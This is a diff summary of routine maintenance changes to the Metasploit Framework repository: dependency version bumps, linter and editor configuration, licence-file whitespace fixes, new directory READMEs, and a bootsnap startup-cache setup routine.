Land #18024 , fix case-insensitive hash collisions

bump credential version
Land #18009 , Clearing http web data service credentials in msfconsole
2023-05-25 10:42:39 -05:00 · 2023-05-25 10:38:39 -05:00 · 2023-05-23 12:15:52 -05:00 · 2023-05-23 08:57:43 -05:00 · 2023-05-23 09:30:18 -04:00 · 2023-05-22 18:44:09 +01:00
553 changed files with 42026 additions and 4114 deletions
@@ -191,6 +191,14 @@ jobs:
                    Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
                  `
                },
+                attic: {
+                  close: true,
+                  comment: `
+                    Thanks for your contribution to Metasploit Framework! We've looked at this issue, and unfortunately we do not currently have the bandwidth to prioritize this issue.
+            
+                    We've labeled this as \`attic\` and closed it for now. If you believe this issue has been closed in error, or that it should be prioritized, please comment with additional information.
+                  `
+                }
              }
            };

@@ -19,6 +19,8 @@ Gemfile.local.lock
 .yardoc
 # Mac OS X files
 .DS_Store
+# Ignore Solargraph config file
+.solargraph.yml
 # database config for testing
 config/database.yml
 # target config file for testing
@@ -79,6 +79,17 @@ Lint/UnexpectedBlockArity:
 Lint/UnmodifiedReduceAccumulator:
  Enabled: true

+Lint/UnusedMethodArgument:
+  Description: >-
+    Disabled on files under the lib/ directory (aka library files)
+    as this can break YARD documentation since YARD doesn't recognize
+    the _ prefix before parameter names and thinks its a different argument.
+    See https://github.com/rapid7/metasploit-framework/pull/17735
+    Also see https://github.com/rubocop/rubocop/pull/11020
+  Enabled: true
+  Exclude:
+    - 'lib/**/*'
+
 Style/ArgumentsForwarding:
  Enabled: true

@@ -175,12 +186,13 @@ Lint/DeprecatedGemVersion:
  Exclude:
    - 'metasploit-framework.gemspec'

-Metrics/ClassLength:
+Metrics/ModuleLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
-  Enabled: true
-  Exclude:
-    - 'modules/**/*'
-    - 'test/modules/**/*'
+  Enabled: false
+
+Metrics/ClassLength:
+  Description: 'Most Metasploit classes are quite large. This is ok.'
+  Enabled: false

 Style/ClassAndModuleChildren:
  Enabled: false
@@ -0,0 +1,28 @@
+---
+include:
+- "**/*.rb"
+exclude:
+- spec/**/*
+- test/**/*
+- vendor/**/*
+- ".bundle/**/*"
+- modules/**/*
+- data/**/*
+- db/**/*
+- external/**/*
+- plugins/**/*
+- scripts/**/* # Some of this is old and may not need indexing???
+require: []
+domains: []
+reporters:
+- rubocop
+- require_not_found
+formatter:
+  rubocop:
+    cops: safe
+    except: []
+    only: []
+    extra_args: []
+require_paths: []
+plugins: []
+max_files: 0
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.3.4)
+    metasploit-framework (6.3.18)
      actionpack (~> 7.0)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
@@ -10,7 +10,9 @@ PATH
      aws-sdk-s3
      bcrypt
      bcrypt_pbkdf
+      bootsnap
      bson
+      chunky_png
      dnsruby
      ed25519
      em-http-request
@@ -29,11 +31,11 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.108)
+      metasploit-payloads (= 2.0.130)
      metasploit_data_models
      metasploit_payloads-mettle (= 1.0.20)
      mqtt
-      msgpack
+      msgpack (~> 1.6.0)
      nessus_rest
      net-ldap
      net-smtp
@@ -97,52 +99,52 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.1.0)
-    actionpack (7.0.4.2)
-      actionview (= 7.0.4.2)
-      activesupport (= 7.0.4.2)
+    actionpack (7.0.4.3)
+      actionview (= 7.0.4.3)
+      activesupport (= 7.0.4.3)
      rack (~> 2.0, >= 2.2.0)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (7.0.4.2)
-      activesupport (= 7.0.4.2)
+    actionview (7.0.4.3)
+      activesupport (= 7.0.4.3)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (7.0.4.2)
-      activesupport (= 7.0.4.2)
-    activerecord (7.0.4.2)
-      activemodel (= 7.0.4.2)
-      activesupport (= 7.0.4.2)
-    activesupport (7.0.4.2)
+    activemodel (7.0.4.3)
+      activesupport (= 7.0.4.3)
+    activerecord (7.0.4.3)
+      activemodel (= 7.0.4.3)
+      activesupport (= 7.0.4.3)
+    activesupport (7.0.4.3)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
      tzinfo (~> 2.0)
-    addressable (2.8.1)
+    addressable (2.8.4)
      public_suffix (>= 2.0.2, < 6.0)
    afm (0.2.2)
    arel-helpers (2.14.0)
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.707.0)
-    aws-sdk-core (3.170.0)
+    aws-partitions (1.749.0)
+    aws-sdk-core (3.171.0)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.651.0)
      aws-sigv4 (~> 1.5)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.364.0)
+    aws-sdk-ec2 (1.375.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.75.0)
+    aws-sdk-iam (1.77.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.62.0)
+    aws-sdk-kms (1.63.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.119.0)
+    aws-sdk-s3 (1.120.1)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.4)
@@ -151,20 +153,23 @@ GEM
    bcrypt (3.1.18)
    bcrypt_pbkdf (1.1.0)
    bindata (2.4.15)
+    bootsnap (1.16.0)
+      msgpack (~> 1.2)
    bson (4.15.0)
    builder (3.2.4)
    byebug (11.1.3)
+    chunky_png (1.4.0)
    coderay (1.1.3)
-    concurrent-ruby (1.2.0)
+    concurrent-ruby (1.2.2)
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.4.1)
-    debug (1.7.1)
+    debug (1.7.2)
      irb (>= 1.5.0)
      reline (>= 0.3.1)
    diff-lcs (1.5.0)
-    dnsruby (1.61.9)
-      simpleidn (~> 0.1)
+    dnsruby (1.70.0)
+      simpleidn (~> 0.2.1)
    docile (1.4.0)
    domain_name (0.5.20190701)
      unf (>= 0.0.5, < 1.0.0)
@@ -184,15 +189,15 @@ GEM
    factory_bot_rails (6.2.0)
      factory_bot (~> 6.2.0)
      railties (>= 5.0.0)
-    faker (3.1.1)
+    faker (3.2.0)
      i18n (>= 1.8.11, < 2)
    faraday (2.7.4)
      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
    faraday-net_http (3.0.2)
-    faraday-retry (2.0.0)
+    faraday-retry (2.1.0)
      faraday (~> 2.0)
-    faye-websocket (0.11.1)
+    faye-websocket (0.11.2)
      eventmachine (>= 0.12.0)
      websocket-driver (>= 0.5.1)
    ffi (1.15.5)
@@ -215,7 +220,7 @@ GEM
    i18n (1.12.0)
      concurrent-ruby (~> 1.0)
    io-console (0.6.0)
-    irb (1.6.2)
+    irb (1.6.4)
      reline (>= 0.3.0)
    jmespath (1.6.2)
    jsobfu (0.4.2)
@@ -225,7 +230,7 @@ GEM
    logging (2.3.1)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
-    loofah (2.19.1)
+    loofah (2.20.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
    memory_profiler (1.0.1)
@@ -235,7 +240,7 @@ GEM
      activesupport (~> 7.0)
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.2)
+    metasploit-credential (6.0.5)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -249,7 +254,7 @@ GEM
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
-    metasploit-payloads (2.0.108)
+    metasploit-payloads (2.0.130)
    metasploit_data_models (6.0.2)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
@@ -263,23 +268,23 @@ GEM
    metasploit_payloads-mettle (1.0.20)
    method_source (1.0.0)
    mini_portile2 (2.8.1)
-    minitest (5.17.0)
-    mqtt (0.5.0)
-    msgpack (1.6.0)
+    minitest (5.18.0)
+    mqtt (0.6.0)
+    msgpack (1.6.1)
    multi_json (1.15.0)
    mustermann (3.0.0)
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
-    net-ldap (0.17.1)
+    net-ldap (0.18.0)
    net-protocol (0.2.1)
      timeout
    net-smtp (0.3.3)
      net-protocol
-    net-ssh (7.0.1)
+    net-ssh (7.1.0)
    network_interface (0.0.2)
    nexpose (7.3.0)
-    nio4r (2.5.8)
-    nokogiri (1.14.1)
+    nio4r (2.5.9)
+    nokogiri (1.14.3)
      mini_portile2 (~> 2.8.0)
      racc (~> 1.4)
    nori (2.6.0)
@@ -291,8 +296,8 @@ GEM
    openvas-omp (0.0.4)
    packetfu (1.1.13)
      pcaprub
-    parallel (1.22.1)
-    parser (3.2.0.0)
+    parallel (1.23.0)
+    parser (3.2.2.1)
      ast (~> 2.4.1)
    patch_finder (1.0.2)
    pcaprub (0.13.1)
@@ -302,7 +307,7 @@ GEM
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.4.5)
+    pg (1.4.6)
    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
@@ -310,22 +315,22 @@ GEM
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
    public_suffix (5.0.1)
-    puma (6.0.2)
+    puma (6.2.2)
      nio4r (~> 2.0)
    racc (1.6.2)
-    rack (2.2.6.2)
-    rack-protection (3.0.5)
+    rack (2.2.6.4)
+    rack-protection (3.0.6)
      rack
-    rack-test (2.0.2)
+    rack-test (2.1.0)
      rack (>= 1.3)
    rails-dom-testing (2.0.3)
      activesupport (>= 4.2.0)
      nokogiri (>= 1.6)
    rails-html-sanitizer (1.5.0)
      loofah (~> 2.19, >= 2.19.1)
-    railties (7.0.4.2)
-      actionpack (= 7.0.4.2)
-      activesupport (= 7.0.4.2)
+    railties (7.0.4.3)
+      actionpack (= 7.0.4.3)
+      activesupport (= 7.0.4.3)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
@@ -335,11 +340,11 @@ GEM
    rasn1 (0.12.1)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
-    recog (3.0.3)
+    recog (3.1.1)
      nokogiri
    redcarpet (3.6.0)
-    regexp_parser (2.6.2)
-    reline (0.3.2)
+    regexp_parser (2.8.0)
+    reline (0.3.3)
      io-console (~> 0.5)
    rex-arch (0.1.14)
      rex-text
@@ -349,12 +354,12 @@ GEM
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.30)
+    rex-core (0.1.31)
    rex-encoder (0.1.6)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.37)
+    rex-exploitation (0.1.38)
      jsobfu
      metasm
      rex-arch
@@ -379,14 +384,14 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.47)
+    rex-socket (0.1.51)
      rex-core
    rex-sslscan (0.1.9)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.3)
-    rex-text (0.2.49)
+    rex-text (0.2.50)
    rex-zip (0.1.4)
      rex-text
    rexml (3.2.5)
@@ -400,7 +405,7 @@ GEM
    rspec-expectations (3.12.2)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.12.0)
-    rspec-mocks (3.12.3)
+    rspec-mocks (3.12.5)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.12.0)
    rspec-rails (6.0.1)
@@ -414,24 +419,24 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.12.0)
-    rubocop (1.44.1)
+    rubocop (1.50.2)
      json (~> 2.3)
      parallel (~> 1.10)
      parser (>= 3.2.0.0)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.24.1, < 2.0)
+      rubocop-ast (>= 1.28.0, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 2.4.0, < 3.0)
-    rubocop-ast (1.24.1)
-      parser (>= 3.1.1.0)
+    rubocop-ast (1.28.0)
+      parser (>= 3.2.1.0)
    ruby-macho (3.0.0)
    ruby-prof (1.4.2)
-    ruby-progressbar (1.11.0)
+    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.2.4)
+    ruby_smb (3.2.5)
      bindata
      openssl-ccm
      openssl-cmac
@@ -448,37 +453,37 @@ GEM
    simplecov-html (0.12.3)
    simpleidn (0.2.1)
      unf (~> 0.1.4)
-    sinatra (3.0.5)
+    sinatra (3.0.6)
      mustermann (~> 3.0)
      rack (~> 2.2, >= 2.2.4)
-      rack-protection (= 3.0.5)
+      rack-protection (= 3.0.6)
      tilt (~> 2.0)
-    sqlite3 (1.6.0)
+    sqlite3 (1.6.2)
      mini_portile2 (~> 2.8.0)
    sshkey (2.0.0)
    strptime (0.2.5)
    swagger-blocks (3.0.0)
-    thin (1.8.1)
+    thin (1.8.2)
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
    thor (1.2.1)
-    tilt (2.0.11)
+    tilt (2.1.0)
    timecop (0.9.6)
-    timeout (0.3.1)
+    timeout (0.3.2)
    ttfunk (1.7.0)
    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2022.7)
+    tzinfo-data (1.2023.3)
      tzinfo (>= 1.0.0)
    unf (0.1.4)
      unf_ext
    unf_ext (0.0.8.2)
    unicode-display_width (2.4.2)
-    unix-crypt (1.3.0)
+    unix-crypt (1.3.1)
    warden (1.2.9)
      rack (>= 2.0.9)
-    webrick (1.7.0)
+    webrick (1.8.1)
    websocket-driver (0.7.5)
      websocket-extensions (>= 0.1.0)
    websocket-extensions (0.1.5)
@@ -498,9 +503,8 @@ GEM
      activesupport (>= 4.2, < 8.0)
    xmlrpc (0.3.2)
      webrick
-    yard (0.9.28)
-      webrick (~> 1.7.0)
-    zeitwerk (2.6.6)
+    yard (0.9.34)
+    zeitwerk (2.6.7)

 PLATFORMS
  ruby
@@ -152,7 +152,7 @@ Copyright: 2017 Yukihiro Matsumoto
 License: Ruby

 Files: lib/msf/core/modules/external/python/async_timeout/*
-Copyright: 2016-2017 Andrew Svetlov
+Copyright: 2016-2023 Andrew Svetlov
 License: Apache 2.0

 Files: lib/msf/core/web_services/public/*
@@ -227,7 +227,7 @@ Purpose: This module contains the source code for FUSE, which this module
 Files: modules/exploits/linux/local/ntfs3g_priv_esc.rb
 Copyright: 2017
 License: GPLv2
-Purpose: The Ruby file contains the text of several modules from exploit-db 
+Purpose: The Ruby file contains the text of several modules from exploit-db
         which it compiles and uploads to the target to elevate privileges.

 Files: modules/exploits/unix/fileformat/metasploit_libnotify_cmd_injection.rb
@@ -239,7 +239,7 @@ Purpose: This module targets a vulnerability in Metasploit Framework versions
 Files: modules/exploits/windows/smb/ms04_007_killbill.rb
 Copyright: 2004, Solar Eclipse
 License: GPL
-Purpose: The module exploits the Windows ASN.1 vulnerability in Windows 2000 
+Purpose: The module exploits the Windows ASN.1 vulnerability in Windows 2000
         SP2-SP4 and Windows XP SP0-SP1. It contains code ported from a GPLv2
         module.

@@ -255,7 +255,7 @@ Purpose: This module allows us to create an x64 Windows messagebox payload.
 Files: modules/post/linux/dos/xen_420_dos.rb
 Copyright: 2016
 License: GPL
-Purpose: This module crashes the Xen 4.2.0 hypervisor when run in a 
+Purpose: This module crashes the Xen 4.2.0 hypervisor when run in a
         paravirtualized VM. It contains a short code section licensed through
         GPL.

@@ -1,37 +1,39 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.1.0, MIT
-actionpack, 7.0.4.2, MIT
-actionview, 7.0.4.2, MIT
-activemodel, 7.0.4.2, MIT
-activerecord, 7.0.4.2, MIT
-activesupport, 7.0.4.2, MIT
-addressable, 2.8.1, "Apache 2.0"
+actionpack, 7.0.4.3, MIT
+actionview, 7.0.4.3, MIT
+activemodel, 7.0.4.3, MIT
+activerecord, 7.0.4.3, MIT
+activesupport, 7.0.4.3, MIT
+addressable, 2.8.4, "Apache 2.0"
 afm, 0.2.2, MIT
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.707.0, "Apache 2.0"
-aws-sdk-core, 3.170.0, "Apache 2.0"
-aws-sdk-ec2, 1.364.0, "Apache 2.0"
-aws-sdk-iam, 1.75.0, "Apache 2.0"
-aws-sdk-kms, 1.62.0, "Apache 2.0"
-aws-sdk-s3, 1.119.0, "Apache 2.0"
+aws-partitions, 1.749.0, "Apache 2.0"
+aws-sdk-core, 3.171.0, "Apache 2.0"
+aws-sdk-ec2, 1.375.0, "Apache 2.0"
+aws-sdk-iam, 1.77.0, "Apache 2.0"
+aws-sdk-kms, 1.63.0, "Apache 2.0"
+aws-sdk-s3, 1.120.1, "Apache 2.0"
 aws-sigv4, 1.5.2, "Apache 2.0"
 bcrypt, 3.1.18, MIT
 bcrypt_pbkdf, 1.1.0, MIT
 bindata, 2.4.15, "Simplified BSD"
+bootsnap, 1.16.0, MIT
 bson, 4.15.0, "Apache 2.0"
 builder, 3.2.4, MIT
 bundler, 2.1.4, MIT
 byebug, 11.1.3, "Simplified BSD"
+chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.2.0, MIT
+concurrent-ruby, 1.2.2, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
-debug, 1.7.1, "ruby, Simplified BSD"
+debug, 1.7.2, "ruby, Simplified BSD"
 diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
-dnsruby, 1.61.9, "Apache 2.0"
+dnsruby, 1.70.0, "Apache 2.0"
 docile, 1.4.0, MIT
 domain_name, 0.5.20190701, "Simplified BSD, New BSD, Mozilla Public License 2.0"
 ed25519, 1.3.0, MIT
@@ -41,11 +43,11 @@ erubi, 1.12.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.2.1, MIT
 factory_bot_rails, 6.2.0, MIT
-faker, 3.1.1, MIT
+faker, 3.2.0, MIT
 faraday, 2.7.4, MIT
 faraday-net_http, 3.0.2, MIT
-faraday-retry, 2.0.0, MIT
-faye-websocket, 0.11.1, "Apache 2.0"
+faraday-retry, 2.1.0, MIT
+faye-websocket, 0.11.2, "Apache 2.0"
 ffi, 1.15.5, "New BSD"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
@@ -59,74 +61,74 @@ http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
 i18n, 1.12.0, MIT
 io-console, 0.6.0, "ruby, Simplified BSD"
-irb, 1.6.2, "ruby, Simplified BSD"
+irb, 1.6.4, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
 json, 2.6.3, ruby
 little-plugger, 1.1.4, MIT
 logging, 2.3.1, MIT
-loofah, 2.19.1, MIT
+loofah, 2.20.0, MIT
 memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.1, "New BSD"
-metasploit-credential, 6.0.2, "New BSD"
-metasploit-framework, 6.3.4, "New BSD"
+metasploit-credential, 6.0.4, "New BSD"
+metasploit-framework, 6.3.18, "New BSD"
 metasploit-model, 5.0.1, "New BSD"
-metasploit-payloads, 2.0.108, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.130, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.2, "New BSD"
 metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
 mini_portile2, 2.8.1, MIT
-minitest, 5.17.0, MIT
-mqtt, 0.5.0, MIT
-msgpack, 1.6.0, "Apache 2.0"
+minitest, 5.18.0, MIT
+mqtt, 0.6.0, MIT
+msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 3.0.0, MIT
 nessus_rest, 0.1.6, MIT
-net-ldap, 0.17.1, MIT
+net-ldap, 0.18.0, MIT
 net-protocol, 0.2.1, "ruby, Simplified BSD"
 net-smtp, 0.3.3, "ruby, Simplified BSD"
-net-ssh, 7.0.1, MIT
+net-ssh, 7.1.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.3.0, "New BSD"
-nio4r, 2.5.8, MIT
-nokogiri, 1.14.1, MIT
+nio4r, 2.5.9, MIT
+nokogiri, 1.14.3, MIT
 nori, 2.6.0, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
 openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
-parallel, 1.22.1, MIT
-parser, 3.2.0.0, MIT
+parallel, 1.23.0, MIT
+parser, 3.2.2.1, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.1, LGPL-2.1
 pdf-reader, 2.11.0, MIT
-pg, 1.4.5, "Simplified BSD"
+pg, 1.4.6, "Simplified BSD"
 pry, 0.14.2, MIT
 pry-byebug, 3.10.1, MIT
 public_suffix, 5.0.1, MIT
-puma, 6.0.2, "New BSD"
+puma, 6.2.2, "New BSD"
 racc, 1.6.2, "ruby, Simplified BSD"
-rack, 2.2.6.2, MIT
-rack-protection, 3.0.5, MIT
-rack-test, 2.0.2, MIT
+rack, 2.2.6.4, MIT
+rack-protection, 3.0.6, MIT
+rack-test, 2.1.0, MIT
 rails-dom-testing, 2.0.3, MIT
 rails-html-sanitizer, 1.5.0, MIT
-railties, 7.0.4.2, MIT
+railties, 7.0.4.3, MIT
 rainbow, 3.1.1, MIT
 rake, 13.0.6, MIT
 rasn1, 0.12.1, MIT
 rb-readline, 0.5.5, BSD
-recog, 3.0.3, unknown
+recog, 3.1.1, unknown
 redcarpet, 3.6.0, MIT
-regexp_parser, 2.6.2, MIT
-reline, 0.3.2, ruby
+regexp_parser, 2.8.0, MIT
+reline, 0.3.3, ruby
 rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
-rex-core, 0.1.30, "New BSD"
+rex-core, 0.1.31, "New BSD"
 rex-encoder, 0.1.6, "New BSD"
-rex-exploitation, 0.1.37, "New BSD"
+rex-exploitation, 0.1.38, "New BSD"
 rex-java, 0.1.6, "New BSD"
 rex-mime, 0.1.7, "New BSD"
 rex-nop, 0.1.2, "New BSD"
@@ -135,53 +137,53 @@ rex-powershell, 0.1.97, "New BSD"
 rex-random_identifier, 0.1.10, "New BSD"
 rex-registry, 0.1.4, "New BSD"
 rex-rop_builder, 0.1.4, "New BSD"
-rex-socket, 0.1.47, "New BSD"
+rex-socket, 0.1.51, "New BSD"
 rex-sslscan, 0.1.9, "New BSD"
 rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.49, "New BSD"
+rex-text, 0.2.50, "New BSD"
 rex-zip, 0.1.4, "New BSD"
 rexml, 3.2.5, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.12.0, MIT
 rspec-core, 3.12.1, MIT
 rspec-expectations, 3.12.2, MIT
-rspec-mocks, 3.12.3, MIT
+rspec-mocks, 3.12.5, MIT
 rspec-rails, 6.0.1, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.12.0, MIT
-rubocop, 1.44.1, MIT
-rubocop-ast, 1.24.1, MIT
+rubocop, 1.50.2, MIT
+rubocop-ast, 1.28.0, MIT
 ruby-macho, 3.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
-ruby-progressbar, 1.11.0, MIT
+ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.2.4, "New BSD"
+ruby_smb, 3.2.5, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT
-sinatra, 3.0.5, MIT
-sqlite3, 1.6.0, "New BSD"
+sinatra, 3.0.6, MIT
+sqlite3, 1.6.2, "New BSD"
 sshkey, 2.0.0, MIT
 strptime, 0.2.5, "Simplified BSD"
 swagger-blocks, 3.0.0, MIT
-thin, 1.8.1, "GPL-2.0+, ruby"
+thin, 1.8.2, "GPL-2.0+, ruby"
 thor, 1.2.1, MIT
-tilt, 2.0.11, MIT
+tilt, 2.1.0, MIT
 timecop, 0.9.6, MIT
-timeout, 0.3.1, "ruby, Simplified BSD"
+timeout, 0.3.2, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 2.0.6, MIT
-tzinfo-data, 1.2022.7, MIT
+tzinfo-data, 1.2023.3, MIT
 unf, 0.1.4, "2-clause BSDL"
 unf_ext, 0.0.8.2, MIT
 unicode-display_width, 2.4.2, MIT
-unix-crypt, 1.3.0, BSD
+unix-crypt, 1.3.1, 0BSD
 warden, 1.2.9, MIT
-webrick, 1.7.0, "ruby, Simplified BSD"
+webrick, 1.8.1, "ruby, Simplified BSD"
 websocket-driver, 0.7.5, "Apache 2.0"
 websocket-extensions, 0.1.5, "Apache 2.0"
 win32api, 0.1.0, unknown
@@ -189,5 +191,5 @@ windows_error, 0.1.5, BSD
 winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.2, "ruby, Simplified BSD"
-yard, 0.9.28, MIT
-zeitwerk, 2.6.6, MIT
+yard, 0.9.34, MIT
+zeitwerk, 2.6.7, MIT
@@ -0,0 +1 @@
+This directory contains ActiveRecord concerns, models and validators.
@@ -0,0 +1,3 @@
+Contains various files that help configure Metasploit. Most files here you'll never have to deal with, though
+`database.yml.example` might be useful for those looking to configure their database, and `openssl.conf`
+might be helpful for those trying to troubleshoot OpenSSL issues in Metasploit.
@@ -47,7 +47,7 @@ module Metasploit
      when "test"
        config.eager_load = false
      when "production"
-        config.eager_load = true
+        config.eager_load = false
      end

      if ActiveRecord.respond_to?(:legacy_connection_handling=)
@@ -38,3 +38,64 @@ lib_path = root.join('lib').to_path
 unless $LOAD_PATH.include? lib_path
  $LOAD_PATH.unshift lib_path
 end
+
+require 'digest'
+require 'metasploit/framework/version'
+require 'msf/base/config'
+
+# Invalidate and delete the bootsnap cache if required. For instance if the metasploit-framework version has changed.
+#
+# @param [Hash] bootsnap_config See https://github.com/Shopify/bootsnap/blob/95e8d170aea99a831fd484ce09ad2f195644e740/lib/bootsnap.rb#L38
+# @return [void]
+def invalidate_bootsnap_cache!(bootsnap_config)
+  expected_cache_metadata = {
+    'metasploit_framework_version' => Metasploit::Framework::Version::VERSION,
+    'ruby_description' => RUBY_DESCRIPTION,
+    'bundler_lockfile_hash' => Digest::MD5.hexdigest(Bundler.read_file(Bundler.default_lockfile)),
+    'bootsnap_config' => {
+      'load_path_cache' => bootsnap_config[:load_path_cache],
+      'compile_cache_iseq' => bootsnap_config[:compile_cache_iseq],
+      'compile_cache_yaml' => bootsnap_config[:compile_cache_yaml],
+    }
+  }
+
+  cache_metadata_path = File.join(bootsnap_config[:cache_dir], "metadata.yaml")
+  if File.exist?(cache_metadata_path)
+    cache_metadata = YAML.safe_load(File.binread(cache_metadata_path))
+    if cache_metadata != expected_cache_metadata
+      FileUtils.rm_rf(bootsnap_config[:cache_dir], secure: true)
+    end
+  end
+
+  FileUtils.mkdir_p(bootsnap_config[:cache_dir])
+  File.binwrite(cache_metadata_path, expected_cache_metadata.to_yaml)
+
+  nil
+end
+
+# Attempt to use bootsnap caching for improved startup time
+begin
+  require 'bootsnap'
+  env = ENV['RAILS_ENV'] || ENV['RACK_ENV'] || ENV['ENV']
+  development_mode = ['', nil, 'development'].include?(env)
+
+  cache_dir = ::File.join(Msf::Config.config_directory, "bootsnap_cache")
+  bootsnap_config = {
+    cache_dir: cache_dir,
+    ignore_directories: [],
+    development_mode: development_mode,
+    load_path_cache: true, # Optimize the LOAD_PATH with a cache
+    compile_cache_iseq: false, # Don't compile Ruby code into ISeq cache, breaks coverage reporting.
+    compile_cache_yaml: false, # Don't compile YAML into a cache
+    readonly: false, # Update caches - https://github.com/Shopify/bootsnap/commit/b51397f96c33aa421fd5c29484fb9574df9eb451
+  }
+  invalidate_bootsnap_cache!(bootsnap_config)
+  Bootsnap.setup(**bootsnap_config)
+rescue
+  $stderr.puts 'Warning: Failed bootsnap cache setup'
+  begin
+    FileUtils.rm_rf(cache_dir, secure: true)
+  rescue
+    $stderr.puts 'Warning: Failed deleting bootsnap cache'
+  end
+end
@@ -0,0 +1,7 @@
+This folder contains various data files used for a variety of purposes, including but not limited to banners for the
+console, exploit source code for exploits (under `data/exploits`), template code and binaries, wordlists and shellcode.
+
+As a general rule of thumb this folder will most often be used when you are using compiled binaries or source code from
+other exploits for cases such as local privilege escalation exploits and need to provide the exploit code and compiled
+binaries so that maintainers can verify the binary and compile it themselves, as so that modules can find the R7 compiled
+version of the resulting binary for use during exploitation.
@@ -0,0 +1,27 @@
+---
